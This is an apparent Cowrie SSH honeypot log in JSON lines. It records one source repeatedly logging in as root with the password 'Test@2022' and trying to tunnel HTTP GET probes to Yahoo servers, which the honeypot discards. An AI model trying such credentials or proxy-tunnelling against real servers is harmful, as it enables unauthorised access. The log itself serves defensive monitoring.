{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.469206Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9385,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9385","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.622988Z","session":"02e062434d40"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.656908Z","src_ip":"212.227.125.160","session":"bd99b16ce4a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.679327Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.736286Z","src_ip":"213.209.150.239","session":"02e062434d40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35938,"dst_ip":"1.2.3.4","dst_port":22,"session":"131c7d825f25","protocol":"ssh","message":"New connection: 212.227.235.229:35938 (1.2.3.4:22) [session: 131c7d825f25]","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.782096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.783385Z","src_ip":"212.227.235.229","session":"131c7d825f25"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53561,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d34b5f75395","protocol":"ssh","message":"New connection: 213.209.150.239:53561 (1.2.3.4:22) [session: 1d34b5f75395]","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.791653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.792168Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:48.848667Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.051916Z","src_ip":"212.227.235.229","session":"131c7d825f25"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.130379Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8177,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8177","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.188076Z","session":"1d34b5f75395"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.244736Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.317757Z","src_ip":"212.227.235.229","session":"e165466a8bb9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":9682,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9682","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.398886Z","session":"1d34b5f75395"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.455494Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.513019Z","src_ip":"213.209.150.239","session":"1d34b5f75395"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53604,"dst_ip":"1.2.3.4","dst_port":22,"session":"2afd2f566333","protocol":"ssh","message":"New connection: 213.209.150.239:53604 (1.2.3.4:22) [session: 2afd2f566333]","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.559276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.560296Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.607406Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.842338Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24124,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24124","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.890575Z","session":"2afd2f566333"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:49.937943Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":20045,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20045","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.073684Z","session":"2afd2f566333"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.122423Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.171295Z","src_ip":"213.209.150.239","session":"2afd2f566333"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53643,"dst_ip":"1.2.3.4","dst_port":22,"session":"080f87a639e8","protocol":"ssh","message":"New connection: 213.209.150.239:53643 (1.2.3.4:22) [session: 080f87a639e8]","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.226950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.227566Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.284554Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.567085Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":20016,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:20016","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.625013Z","session":"080f87a639e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.683106Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":4928,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4928","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.839142Z","session":"080f87a639e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.895987Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:50.953599Z","src_ip":"213.209.150.239","session":"080f87a639e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53705,"dst_ip":"1.2.3.4","dst_port":22,"session":"d47366251da2","protocol":"ssh","message":"New connection: 213.209.150.239:53705 (1.2.3.4:22) [session: d47366251da2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.010410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.011551Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.068332Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.351738Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6186,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6186","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.409368Z","session":"d47366251da2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.466028Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":15127,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15127","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.623022Z","session":"d47366251da2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.679699Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.737253Z","src_ip":"213.209.150.239","session":"d47366251da2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53757,"dst_ip":"1.2.3.4","dst_port":22,"session":"e39101b2b0e0","protocol":"ssh","message":"New connection: 213.209.150.239:53757 (1.2.3.4:22) [session: e39101b2b0e0]","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.792789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.793422Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:51.850387Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.133073Z","src_ip":"213.209.150.239","session":"e39101b2b0e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27173,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27173","sensor":"my-vps","timestamp":"2025-08-26T00:55:52.190682Z","session":"e39101b2b0e0"}
